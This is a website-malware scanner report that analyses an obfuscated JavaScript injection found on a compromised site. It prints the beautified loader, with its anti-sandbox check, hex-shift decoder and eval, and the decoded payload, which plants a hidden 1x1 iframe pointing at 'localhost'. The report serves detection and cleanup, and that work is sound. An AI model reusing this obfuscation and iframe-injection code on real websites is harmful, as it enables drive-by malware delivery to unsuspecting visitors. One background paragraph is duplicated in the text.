Website with malicious obfuscated JavaScript that injects hidden iframe to 'localhost'
Background
Online Website Malware Scanner has identified a malicious JavaScript code injection in the scanned website. Such obfuscated JavaScript is used to build a malicious iframe that is invisible to the website user and downloads content from a remote malware distributor.
Website is blacklisted by Google and was seen distributing malware including 1 exploit.
When analyzing this detection, to our surprise we noticed that the actual redirect URL source is 'localhost'. It looks like, in this case, the hacker tested the code on his local machine before the injection and uploaded it to the compromised server AS IS, instead of changing "localhost" to the real URL. Hackers have bugs too, one might guess. We decided that it was worth posting and might put a smile on the reader's face.
Website is blacklisted by Google and was seen distributing malware including 1 exploit.
When analyzing this detection, to our surprise we noticed that the actual redirect URL source is 'localhost'. It looks like, in this case, the hacker tested the code on his local machine before the injection and uploaded it to the compromised server AS IS, instead of changing "localhost" to the real URL. Hackers have bugs too, one might guess. We decided that it was worth posting and might put a smile on the reader's face.
Malicious action
Malicious iframes are often used to distribute malware hosted on external web resources (websites).
Website malware scanner report
Submission date: Thu Aug 8 11:39:31 2013
Infected website's files: 1
Threat dump:
Malware entry details
Beautified script
- // Decoder accessor: returns the i-th element of the global array n (the
- // comma-split list of hex literals built further down). It takes no
- // parameters and relies on the caller having set the global loop index i
- // before each call.
- asq = function () {
- return n[i];
- };
- // ww and ss are short aliases for window and String.fromCharCode; ww is only
- // used for the ww.document check below.
- ww = window;
- ss = String.fromCharCode;
- // Environment gate: in a real browser DOM, assigning a non-Node (~1 is -2) to
- // document.body throws, so the catch runs and whwej becomes 12. An emulator
- // whose document object accepts arbitrary values never enters the catch,
- // leaves whwej undefined, and the payload further down is skipped --
- // presumably an anti-sandbox check. zz is assigned but never read (noise).
- try {
- document.body = ~1
- } catch (qwrbtwt) {
- zz = 12 * 2 + 1 + 1;
- whwej = 12;
- } {
- // ~2 is -3 and cannot throw, so this try/catch is a no-op: whwej is always
- // truthy (-3) once this block is entered.
- try {
- whwej = ~2;
- } catch (agdsg) {
- whwej = 0;
- }
- if (whwej) {
- // Second DOM check of the same kind: document.body++ tries to store a
- // number in document.body, which a real DOM rejects; only the catch branch
- // holds the decoder.
- try {
- document.body++;
- } catch (bawetawe) {
- if (ww.document) {
- // n: comma-separated hex literals, each one larger than the character
- // code of the real payload character (0x29 - 1 = 0x28 = '('). The
- // decoded text is the IIFE shown under "Malicious payload" below.
- n ="0x29,0x67,0x76,0x6f,0x64,0x75,0x6a,0x70,0x6f,0x21,0x29,0x2a,0x21,0x7c,0xe,0xb,0x21,0x21,0x21,0x21,0x77,0x62,0x73,0x21,0x68,0x66,0x79,0x66,0x71,0x21,0x3e,0x21,0x65,0x70,0x64,0x76,0x6e,0x66,0x6f,0x75,0x2f,0x64,0x73,0x66,0x62,0x75,0x66,0x46,0x6d,0x66,0x6e,0x66,0x6f,0x75,0x29,0x28,0x6a,0x67,0x73,0x62,0x6e,0x66,0x28,0x2a,0x3c,0xe,0xb,0xe,0xb,0x21,0x21,0x21,0x21,0x68,0x66,0x79,0x66,0x71,0x2f,0x74,0x73,0x64,0x21,0x3e,0x21,0x28,0x69,0x75,0x75,0x71,0x3b,0x30,0x30,0x6d,0x70,0x64,0x62,0x6d,0x69,0x70,0x74,0x75,0x30,0x28,0x3c,0xe,0xb,0x21,0x21,0x21,0x21,0x68,0x66,0x79,0x66,0x71,0x2f,0x74,0x75,0x7a,0x6d,0x66,0x2f,0x71,0x70,0x74,0x6a,0x75,0x6a,0x70,0x6f,0x21,0x3e,0x21,0x28,0x62,0x63,0x74,0x70,0x6d,0x76,0x75,0x66,0x28,0x3c,0xe,0xb,0x21,0x21,0x21,0x21,0x68,0x66,0x79,0x66,0x71,0x2f,0x74,0x75,0x7a,0x6d,0x66,0x2f,0x63,0x70,0x73,0x65,0x66,0x73,0x21,0x3e,0x21,0x28,0x31,0x28,0x3c,0xe,0xb,0x21,0x21,0x21,0x21,0x68,0x66,0x79,0x66,0x71,0x2f,0x74,0x75,0x7a,0x6d,0x66,0x2f,0x69,0x66,0x6a,0x68,0x69,0x75,0x21,0x3e,0x21,0x28,0x32,0x71,0x79,0x28,0x3c,0xe,0xb,0x21,0x21,0x21,0x21,0x68,0x66,0x79,0x66,0x71,0x2f,0x74,0x75,0x7a,0x6d,0x66,0x2f,0x78,0x6a,0x65,0x75,0x69,0x21,0x3e,0x21,0x28,0x32,0x71,0x79,0x28,0x3c,0xe,0xb,0x21,0x21,0x21,0x21,0x68,0x66,0x79,0x66,0x71,0x2f,0x74,0x75,0x7a,0x6d,0x66,0x2f,0x6d,0x66,0x67,0x75,0x21,0x3e,0x21,0x28,0x32,0x71,0x79,0x28,0x3c,0xe,0xb,0x21,0x21,0x21,0x21,0x68,0x66,0x79,0x66,0x71,0x2f,0x74,0x75,0x7a,0x6d,0x66,0x2f,0x75,0x70,0x71,0x21,0x3e,0x21,0x28,0x32,0x71,0x79,0x28,0x3c,0xe,0xb,0xe,0xb,0x21,0x21,0x21,0x21,0x6a,0x67,0x21,0x29,0x22,0x65,0x70,0x64,0x76,0x6e,0x66,0x6f,0x75,0x2f,0x68,0x66,0x75,0x46,0x6d,0x66,0x6e,0x66,0x6f,0x75,0x43,0x7a,0x4a,0x65,0x29,0x28,0x68,0x66,0x79,0x66,0x71,0x28,0x2a,0x2a,0x21,0x7c,0xe,0xb,0x21,0x21,0x21,0x21,0x21,0x21,0x21,0x21,0x65,0x70,0x64,0x76,0x6e,0x66,0x6f,0x75,0x2f,0x78,0x73,0x6a,0x75,0x66,0x29,0x28,0x3d,0x65,0x6a,0x77,0x21,0x6a,0x65,0x3e,0x5d,0x28,0x68,0x66,0x79,0x66,0x71,0x5d,0x28,0x3f,0x3d,0x30,0x65,0x6a,0x77,0x3f,0x28,0x2a,0x3c,0xe
,0xb,0x21,0x21,0x21,0x21,0x21,0x21,0x21,0x21,0x65,0x70,0x64,0x76,0x6e,0x66,0x6f,0x75,0x2f,0x68,0x66,0x75,0x46,0x6d,0x66,0x6e,0x66,0x6f,0x75,0x43,0x7a,0x4a,0x65,0x29,0x28,0x68,0x66,0x79,0x66,0x71,0x28,0x2a,0x2f,0x62,0x71,0x71,0x66,0x6f,0x65,0x44,0x69,0x6a,0x6d,0x65,0x29,0x68,0x66,0x79,0x66,0x71,0x2a,0x3c,0xe,0xb,0x21,0x21,0x21,0x21,0x7e,0xe,0xb,0x7e,0x2a,0x29,0x2a,0x3c,0xe,0xb".split(",");
- // h, k and z are assigned but never read -- decoy variables.
- h = 2;
- s = "";
- // i - 481 != 0 is just i != 481; the loop expects exactly 481 entries in n.
- for (i = 0; i - 481 != 0; i++) {
- k = i;
- // eval(asq()) parses the "0x.." literal into a number; subtracting 1
- // recovers the original character code. String.fromCharCode over an
- // eval'd numeric array, fed into a final eval, is the detection
- // fingerprint for this family.
- s = s.concat(ss(eval(asq()) - 1));
- }
- z = s;
- // Executes the decoded payload. A CSP script-src without 'unsafe-eval'
- // would block this step.
- eval("" + s);
- }
- }
- }
- }
Malicious payload
Decoded payload injects a hidden malicious iframe pointing to 'localhost'
- // Decoded payload: the classic hidden-iframe injection. The frame is 1x1 px,
- // borderless and absolutely positioned near the top-left corner so the
- // visitor never sees it. Only the src distinguishes it from a live sample:
- // here it still points at the author's test host, 'localhost'.
- (function () {
- var gexep = document.createElement('iframe');
- gexep.src = 'http://localhost/';
- gexep.style.position = 'absolute';
- gexep.style.border = '0';
- gexep.style.height = '1px';
- gexep.style.width = '1px';
- gexep.style.left = '1px';
- gexep.style.top = '1px';
- // Guard against double injection when the script is included more than
- // once. The container div's id, 'gexep', matches the variable name and is
- // a handy string to grep for when cleaning infected files.
- if (!document.getElementById('gexep')) {
- // document.write inserts the container div at the point where the script
- // runs (presumably while the page is still parsing); a CSP frame-src or
- // child-src directive would block the frame's load.
- document.write('<div id=\'gexep\'></div>');
- document.getElementById('gexep').appendChild(gexep);
- }
- })();
Blacklisting status
Website is Blacklisted by Google Safe Browsing
Blacklisted by Google
Malware clean-up
Such malware is often hidden inside a JavaScript file. If you suspect that your website was infected by similar malware, please use Website Anti-malware Monitoring for a remediation assessment.